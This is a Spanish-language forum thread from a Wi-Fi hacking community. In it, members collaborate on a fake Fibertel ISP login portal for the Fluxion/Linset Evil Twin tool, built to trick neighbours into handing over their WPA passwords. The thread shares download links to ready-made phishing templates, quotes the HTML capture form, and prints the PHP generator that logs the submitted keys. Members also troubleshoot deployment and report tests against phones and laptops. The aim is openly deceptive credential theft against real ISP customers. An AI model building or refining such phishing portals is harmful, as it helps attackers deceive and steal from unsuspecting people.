25 de Junio de 2018, 06:36:45 am
  • WPSdb - Base de Datos de Pines Online

Autor Tema: Pagina Phising Fibertel para Fluxion(antiguamente conocido como Linset)  (Leído 5927 veces)

Desconectado ElPoli#05

  • Usuario
  • *
  • Mensajes: 48
  • Reputación: +0/-0
  • Usuario
  • awards Usuario Registrado
    • Awards
Hola gente como andan?Espero que bien  ;)
Bueno,les comento mi idea:Como la gente de Fibertel esta instalando nuevas redes(aparecen como Fibertel WiFiXXX 2.4GHz) y como no he podido dar con la contraseña de la mayoria,estuve investigando que routers andaban instalando ahora y son unos Arris SBG6700AC(vale aclarar que son doble banda simultanea,emiten en 2.4 GHZ y 5.8 GHZ al mismo tiempo).

Bueno,mi idea es editar la pagina web dentro de la carpeta de fluxion/sites/ARRIS-ESP/ para adaptarla al servicio de internet de aca y que sea mucho mas creible.El problema que yo me encontre era que al querer editar el texto,luego lo guardaba,lo volvia a abrir y no andaba el boton de confirm(indispensable para mandar la contraseña).
Yo cero edicion de HTML(edite el texto con el chrome) :-[
Lo que si pude editar fue la imagen de fondo,que antes era asi:

Y ahora se ve asi:

Pero lo que necesito es que se elimine el texto marcado con celeste al abrir la pagina completa,porque si no,ademas de quedar horrible y poco creible,es un poco redundante por lo que esta escrito arriba ademas de que firmware esta mal escrito.

Lo que haria,seria(una vez teniendo la pagina web modificada)llevar a cabo con ese script un ataque Evil Twin (igual que linset).
Asi todos,si no les da la contraseña,podrian probar este metodo con la web modificada,mucho mas creible(porque la web neutra apenas engaña a una vieja de 70).
Por favor,alguno que sepa editar HTML que pueda ayudarnos? No solo me ayudan a mi,sino a toda la comunidad en general.
Aqui dejo los links:
Imagenes:https://www.mediafire.com/?l0x4y2549j06ere
Programa:http://www.mediafire.com/download/p08rb8ketkcjbod
Que tengan buen dia  :)
  • Antenas: 5dbi,8dbi y direccional de interior WiFiSky 10 dbi
  • Sistemas Operativos: Windows 7 32 bits
  • Sistemas Operativos que utilizo para Auditar: Beini,Wifiway y Wifislax
  • Dispositivos Inalambricos: Nisuta NS-WIU150N51W (con ralink 3070)

Desconectado D3M0N

  • Founder
  • Usuario
  • *
  • Mensajes: 3.139
  • Reputación: +252/-500
  • El Mate, La Netbook y Wi-Fi del Vecino!
  • awards Usuario con más de 2000 Posts! Miembro registrado desde 2010 Usuario Registrado
    • Arg-Wireless.com.ar
    • Awards
Re:Pagina Phising Fibertel para Fluxion(antiguamente conocido como Linset)
« Respuesta #1 en: 21 de Agosto de 2016, 10:30:04 pm »
@ElPoli#05 yo primero antes que nada me pondria del lado del usuario, si es inexperto, posiblemente caiga o no, porque se de mucha gente que si le tiran un cartel que no entienden directamente llaman al servicio. Por ende no creo que sea muy fiable utilizar el portal del fabricante del docsis, ya que por lo general los usuarios no pueden ingresar al mismo y tampoco da confianza al usuario, lo mejor seria usar un portal de fibertel y que sea para que confirmen su contraseña, yo en su tiempo realice uno: http://arg-wireless.com.ar/index.php?topic=1650.msg7366#msg7366 podemos realizar uno nuevo y ver que onda.
  • Antenas: Antena Komarov (Prototype), Antena Belgrain (MOD), Antenas 4, 5, 9dBi (omnis)
  • Sistemas Operativos: Microsoft Windows 7 Enterprice (x64), Ubuntu 14.10.1 LTS Desktop Edition 64-bit
  • Sistemas Operativos que utilizo para Auditar: Ubuntu 14.10.1 LTS Desktop Edition 64-bit
  • Dispositivos Inalambricos: Alfa AWUS036H 1W (USB); TP-Link TL-WN722N (USB); Ubiquiti Nanostation M2; Mikrotik RB951Ui-2HnD

Desconectado D3M0N

  • Founder
  • Usuario
  • *
  • Mensajes: 3.139
  • Reputación: +252/-500
  • El Mate, La Netbook y Wi-Fi del Vecino!
  • awards Usuario con más de 2000 Posts! Miembro registrado desde 2010 Usuario Registrado
    • Arg-Wireless.com.ar
    • Awards
Re:Pagina Phising Fibertel para Fluxion(antiguamente conocido como Linset)
« Respuesta #2 en: 21 de Agosto de 2016, 11:14:02 pm »
Dejo mi skin para Fibertel 2016: http://www.arg-wireless.com.ar/Fibertel-Archivos/Fibertel-Servicios-2016.zip Responsive Adaptable a cualquier dispositivo.-
  • Antenas: Antena Komarov (Prototype), Antena Belgrain (MOD), Antenas 4, 5, 9dBi (omnis)
  • Sistemas Operativos: Microsoft Windows 7 Enterprice (x64), Ubuntu 14.10.1 LTS Desktop Edition 64-bit
  • Sistemas Operativos que utilizo para Auditar: Ubuntu 14.10.1 LTS Desktop Edition 64-bit
  • Dispositivos Inalambricos: Alfa AWUS036H 1W (USB); TP-Link TL-WN722N (USB); Ubiquiti Nanostation M2; Mikrotik RB951Ui-2HnD

Desconectado ElPoli#05

  • Usuario
  • *
  • Mensajes: 48
  • Reputación: +0/-0
  • Usuario
  • awards Usuario Registrado
    • Awards
Re:Pagina Phising Fibertel para Fluxion(antiguamente conocido como Linset)
« Respuesta #3 en: 22 de Agosto de 2016, 02:14:26 pm »
Con que pruebo estas paginas?(fluxion o linset).
Si es Linset,en que version de WifiSlax?
Donde pongo los archivos?
Gracias  :D
  • Antenas: 5dbi,8dbi y direccional de interior WiFiSky 10 dbi
  • Sistemas Operativos: Windows 7 32 bits
  • Sistemas Operativos que utilizo para Auditar: Beini,Wifiway y Wifislax
  • Dispositivos Inalambricos: Nisuta NS-WIU150N51W (con ralink 3070)

Desconectado D3M0N

  • Founder
  • Usuario
  • *
  • Mensajes: 3.139
  • Reputación: +252/-500
  • El Mate, La Netbook y Wi-Fi del Vecino!
  • awards Usuario con más de 2000 Posts! Miembro registrado desde 2010 Usuario Registrado
    • Arg-Wireless.com.ar
    • Awards
Re:Pagina Phising Fibertel para Fluxion(antiguamente conocido como Linset)
« Respuesta #4 en: 22 de Agosto de 2016, 08:22:46 pm »
@ElPoli#05 ni idea, yo la hice como la otra a diferencia que le puse los mensajes de error.
  • Antenas: Antena Komarov (Prototype), Antena Belgrain (MOD), Antenas 4, 5, 9dBi (omnis)
  • Sistemas Operativos: Microsoft Windows 7 Enterprice (x64), Ubuntu 14.10.1 LTS Desktop Edition 64-bit
  • Sistemas Operativos que utilizo para Auditar: Ubuntu 14.10.1 LTS Desktop Edition 64-bit
  • Dispositivos Inalambricos: Alfa AWUS036H 1W (USB); TP-Link TL-WN722N (USB); Ubiquiti Nanostation M2; Mikrotik RB951Ui-2HnD

Desconectado D3M0N

  • Founder
  • Usuario
  • *
  • Mensajes: 3.139
  • Reputación: +252/-500
  • El Mate, La Netbook y Wi-Fi del Vecino!
  • awards Usuario con más de 2000 Posts! Miembro registrado desde 2010 Usuario Registrado
    • Arg-Wireless.com.ar
    • Awards
Re:Pagina Phising Fibertel para Fluxion(antiguamente conocido como Linset)
« Respuesta #5 en: 23 de Agosto de 2016, 08:58:18 pm »
Vamo' a Analizar los componentes del portal para Fluxion:

1.- INDEX.HTM - Es la pagina principal donde pide la WPA. Tiene un iframe al archivo info.html En ningún momento hay un form o PHP para enviar los datos, tampoco un javascript o ajax.

Código: [Seleccionar]
<iframe src="info.html" width="440" height="265" align="center">

el info.html tiene el envió mediante un formulario con el método post contra "check.php" en limpio:

Código: [Seleccionar]
<form id="form1" name="form1" method="POST" action="check.php" >
<font color="#282B2F">WPA</b> Key:
<input name="key1" type="password" class="textfield" />
<INPUT name="Confirm" class="button" type="submit" value="Confirm"/>
</form>

check.php no esta en la carpeta del theme.

Luego hay un error.html que corresponde si colocan mal la contraseña y un final.html que es si colocan bien la contraseña.-

Al parecer el check.php lo crea el programa:

Código: [Seleccionar]
# Creates PHP
echo "<?php
error_reporting(0);

\$count_my_page = (\"$DUMP_PATH/hit.txt\");
\$hits = file(\$count_my_page);
\$hits[0] ++;
\$fp = fopen(\$count_my_page , \"w\");
fputs(\$fp , \"\$hits[0]\");
fclose(\$fp);

// Receive form Post data and Saving it in variables

\$key1 = @\$_POST['key1'];

// Write the name of text file where data will be store
\$filename = \"$DUMP_PATH/data.txt\";
\$filename2 = \"$DUMP_PATH/status.txt\";
\$intento = \"$DUMP_PATH/intento\";
\$attemptlog = \"$DUMP_PATH/pwattempt.txt\";


// Marge all the variables with text in a single variable.
\$f_data= ''.\$key1.'';

\$pwlog = fopen(\$attemptlog, \"w\");
fwrite(\$pwlog,\"\$f_data\");
fwrite(\$pwlog,\"\n\");
fclose(\$pwlog);


if ( (strlen(\$key1) < 8) ) {
echo \"<script type=\\\"text/javascript\\\">alert(\\\"$DIALOG_WEB_LENGHT_MIN\\\");window.history.back()</script>\";
break;
}

if ( (strlen(\$key1) > 63) ) {
echo \"<script type=\\\"text/javascript\\\">alert(\\\"$DIALOG_WEB_LENGHT_MAX\\\");window.history.back()</script>\";
break;
}


\$file = fopen(\$filename, \"w\");
fwrite(\$file,\"\$f_data\");
fwrite(\$file,\"\n\");
fclose(\$file);


\$archivo = fopen(\$intento, \"w\");
fwrite(\$archivo,\"\n\");
fclose(\$archivo);

while(1)
{

if (file_get_contents(\"\$intento\") == 2) {
    top(\"location:final.html\");
    break;
}
if (file_get_contents(\"\$intento\") == 1) {
    top(\"location:error.html\");
    unlink(\$intento);
    break;
}

sleep(1);
}

?>" > $DUMP_PATH/data/check.php

Por ende en los themes viejos hay que cambiar el PHP data/savekey.php por check.php

http://www.arg-wireless.com.ar/Fibertel-Archivos/Fibertel-Servicios-2016-Fluxion.rar
« Última modificación: 23 de Agosto de 2016, 10:50:54 pm por D3M0N »
  • Antenas: Antena Komarov (Prototype), Antena Belgrain (MOD), Antenas 4, 5, 9dBi (omnis)
  • Sistemas Operativos: Microsoft Windows 7 Enterprice (x64), Ubuntu 14.10.1 LTS Desktop Edition 64-bit
  • Sistemas Operativos que utilizo para Auditar: Ubuntu 14.10.1 LTS Desktop Edition 64-bit
  • Dispositivos Inalambricos: Alfa AWUS036H 1W (USB); TP-Link TL-WN722N (USB); Ubiquiti Nanostation M2; Mikrotik RB951Ui-2HnD

Desconectado ElPoli#05

  • Usuario
  • *
  • Mensajes: 48
  • Reputación: +0/-0
  • Usuario
  • awards Usuario Registrado
    • Awards
Re:Pagina Phising Fibertel para Fluxion(antiguamente conocido como Linset)
« Respuesta #6 en: 24 de Agosto de 2016, 04:22:44 pm »
Me fije que onda la pagina y esta de diez.
El problema es que no puedo hacerlo andar de ninguna forma en WifiSlax 4.11.1  :(
Tambien probe ejecutando en la consola el archivo lim.sh y al intentar entrar a la pagina con el telefono (conectado al ap falso) me salta error 404 not found  :'(
  • Antenas: 5dbi,8dbi y direccional de interior WiFiSky 10 dbi
  • Sistemas Operativos: Windows 7 32 bits
  • Sistemas Operativos que utilizo para Auditar: Beini,Wifiway y Wifislax
  • Dispositivos Inalambricos: Nisuta NS-WIU150N51W (con ralink 3070)

Desconectado D3M0N

  • Founder
  • Usuario
  • *
  • Mensajes: 3.139
  • Reputación: +252/-500
  • El Mate, La Netbook y Wi-Fi del Vecino!
  • awards Usuario con más de 2000 Posts! Miembro registrado desde 2010 Usuario Registrado
    • Arg-Wireless.com.ar
    • Awards
Re:Pagina Phising Fibertel para Fluxion(antiguamente conocido como Linset)
« Respuesta #7 en: 24 de Agosto de 2016, 04:56:54 pm »
@ElPoli#05 ni idea, nunca lo use.. no viene en Wifislax v4.12?
  • Antenas: Antena Komarov (Prototype), Antena Belgrain (MOD), Antenas 4, 5, 9dBi (omnis)
  • Sistemas Operativos: Microsoft Windows 7 Enterprice (x64), Ubuntu 14.10.1 LTS Desktop Edition 64-bit
  • Sistemas Operativos que utilizo para Auditar: Ubuntu 14.10.1 LTS Desktop Edition 64-bit
  • Dispositivos Inalambricos: Alfa AWUS036H 1W (USB); TP-Link TL-WN722N (USB); Ubiquiti Nanostation M2; Mikrotik RB951Ui-2HnD

Desconectado ElPoli#05

  • Usuario
  • *
  • Mensajes: 48
  • Reputación: +0/-0
  • Usuario
  • awards Usuario Registrado
    • Awards
Re:Pagina Phising Fibertel para Fluxion(antiguamente conocido como Linset)
« Respuesta #8 en: 24 de Agosto de 2016, 06:27:24 pm »
Me fijo,es que todavia no lo descargue  ;D
  • Antenas: 5dbi,8dbi y direccional de interior WiFiSky 10 dbi
  • Sistemas Operativos: Windows 7 32 bits
  • Sistemas Operativos que utilizo para Auditar: Beini,Wifiway y Wifislax
  • Dispositivos Inalambricos: Nisuta NS-WIU150N51W (con ralink 3070)

Desconectado D3M0N

  • Founder
  • Usuario
  • *
  • Mensajes: 3.139
  • Reputación: +252/-500
  • El Mate, La Netbook y Wi-Fi del Vecino!
  • awards Usuario con más de 2000 Posts! Miembro registrado desde 2010 Usuario Registrado
    • Arg-Wireless.com.ar
    • Awards
Re:Pagina Phising Fibertel para Fluxion(antiguamente conocido como Linset)
« Respuesta #9 en: 26 de Agosto de 2016, 08:36:02 pm »
Alguien lo pudo probar?
  • Antenas: Antena Komarov (Prototype), Antena Belgrain (MOD), Antenas 4, 5, 9dBi (omnis)
  • Sistemas Operativos: Microsoft Windows 7 Enterprice (x64), Ubuntu 14.10.1 LTS Desktop Edition 64-bit
  • Sistemas Operativos que utilizo para Auditar: Ubuntu 14.10.1 LTS Desktop Edition 64-bit
  • Dispositivos Inalambricos: Alfa AWUS036H 1W (USB); TP-Link TL-WN722N (USB); Ubiquiti Nanostation M2; Mikrotik RB951Ui-2HnD

Desconectado D3M0N

  • Founder
  • Usuario
  • *
  • Mensajes: 3.139
  • Reputación: +252/-500
  • El Mate, La Netbook y Wi-Fi del Vecino!
  • awards Usuario con más de 2000 Posts! Miembro registrado desde 2010 Usuario Registrado
    • Arg-Wireless.com.ar
    • Awards
Re:Pagina Phising Fibertel para Fluxion(antiguamente conocido como Linset)
« Respuesta #10 en: 27 de Agosto de 2016, 03:20:18 am »
Bueno baje kali y para instalar un poquito de bardo pero con: https://creadpag.wordpress.com/2015/10/31/como-instalar-linset-en-kali-linux-2-0/ se soluciona!

La plantilla anda pero tiene errores gráficos ya que no se puede utilizar carpetas para dividir los archivos, tiene que estar todo así nomas en una sola carpeta para que detecte los archivos y si es posible con los nombres que usan si o si.

http://www.arg-wireless.com.ar/Fibertel-Archivos/Fibertel-Servicios-2016-Fluxion-v2.rar
  • Antenas: Antena Komarov (Prototype), Antena Belgrain (MOD), Antenas 4, 5, 9dBi (omnis)
  • Sistemas Operativos: Microsoft Windows 7 Enterprice (x64), Ubuntu 14.10.1 LTS Desktop Edition 64-bit
  • Sistemas Operativos que utilizo para Auditar: Ubuntu 14.10.1 LTS Desktop Edition 64-bit
  • Dispositivos Inalambricos: Alfa AWUS036H 1W (USB); TP-Link TL-WN722N (USB); Ubiquiti Nanostation M2; Mikrotik RB951Ui-2HnD

Desconectado D3M0N

  • Founder
  • Usuario
  • *
  • Mensajes: 3.139
  • Reputación: +252/-500
  • El Mate, La Netbook y Wi-Fi del Vecino!
  • awards Usuario con más de 2000 Posts! Miembro registrado desde 2010 Usuario Registrado
    • Arg-Wireless.com.ar
    • Awards
  • Antenas: Antena Komarov (Prototype), Antena Belgrain (MOD), Antenas 4, 5, 9dBi (omnis)
  • Sistemas Operativos: Microsoft Windows 7 Enterprice (x64), Ubuntu 14.10.1 LTS Desktop Edition 64-bit
  • Sistemas Operativos que utilizo para Auditar: Ubuntu 14.10.1 LTS Desktop Edition 64-bit
  • Dispositivos Inalambricos: Alfa AWUS036H 1W (USB); TP-Link TL-WN722N (USB); Ubiquiti Nanostation M2; Mikrotik RB951Ui-2HnD

Desconectado Tony Stark

  • Usuario
  • *
  • Mensajes: 16
  • Reputación: +0/-0
  • Usuario
  • awards Usuario Registrado
    • Awards
Re:Pagina Phising Fibertel para Fluxion(antiguamente conocido como Linset)
« Respuesta #12 en: 27 de Agosto de 2016, 10:07:53 am »
Muchas gracias D3MON! lo que pasa a veces con linset, es que la victima ademas de tener que conectarse ella misma a la red fake, tiene que ingeresar personalmente una pagina al estilo "www.algo.com" si pone una busqueda random en el navegador de android por ejemplo no se carga la pagina fake, y eso complica mucho las cosas.
  • Antenas: Router Dlink DIR600 con DD-WRT
  • Sistemas Operativos: Windows 7, Windows XP
  • Sistemas Operativos que utilizo para Auditar: Wifislax 4-11, Kali, Ubuntu
  • Dispositivos Inalambricos: La placa Atheros de la notebook

Desconectado D3M0N

  • Founder
  • Usuario
  • *
  • Mensajes: 3.139
  • Reputación: +252/-500
  • El Mate, La Netbook y Wi-Fi del Vecino!
  • awards Usuario con más de 2000 Posts! Miembro registrado desde 2010 Usuario Registrado
    • Arg-Wireless.com.ar
    • Awards
Re:Pagina Phising Fibertel para Fluxion(antiguamente conocido como Linset)
« Respuesta #13 en: 28 de Agosto de 2016, 08:46:38 pm »
@Tony Stark y también en Windows 10 en una Notebook Toshiba, me mostraba el segundo AP como "Prueba-AP 2" y eso fue  :-\ en cambio en Android si lo mostraba como "Prueba-AP".
  • Antenas: Antena Komarov (Prototype), Antena Belgrain (MOD), Antenas 4, 5, 9dBi (omnis)
  • Sistemas Operativos: Microsoft Windows 7 Enterprice (x64), Ubuntu 14.10.1 LTS Desktop Edition 64-bit
  • Sistemas Operativos que utilizo para Auditar: Ubuntu 14.10.1 LTS Desktop Edition 64-bit
  • Dispositivos Inalambricos: Alfa AWUS036H 1W (USB); TP-Link TL-WN722N (USB); Ubiquiti Nanostation M2; Mikrotik RB951Ui-2HnD

Desconectado badder

  • Usuario
  • *
  • Mensajes: 70
  • Reputación: +2/-19
  • Bl4st3r
  • awards Usuario Registrado
    • Awards
Re:Pagina Phising Fibertel para Fluxion(antiguamente conocido como Linset)
« Respuesta #14 en: 02 de Septiembre de 2016, 07:46:39 pm »
Hasta el momento de abrir la página para poner la contraseña, anda perfecto. Probado en notebook y telefono con android.


Se cae al tipear la contraseña, mandar enviar y falla el check produciendo error en la página y el script sigue zapateando en Kali mientras tanto....
« Última modificación: 04 de Septiembre de 2016, 09:10:49 pm por D3M0N »
  • Antenas: generic
  • Sistemas Operativos: Windows 10 | WifiSlax 4.12 | Kali 2017.2
  • Sistemas Operativos que utilizo para Auditar: WifiSlax | Kali 2017.2
  • Dispositivos Inalambricos: RTL8187 | Ralink3070
No way out!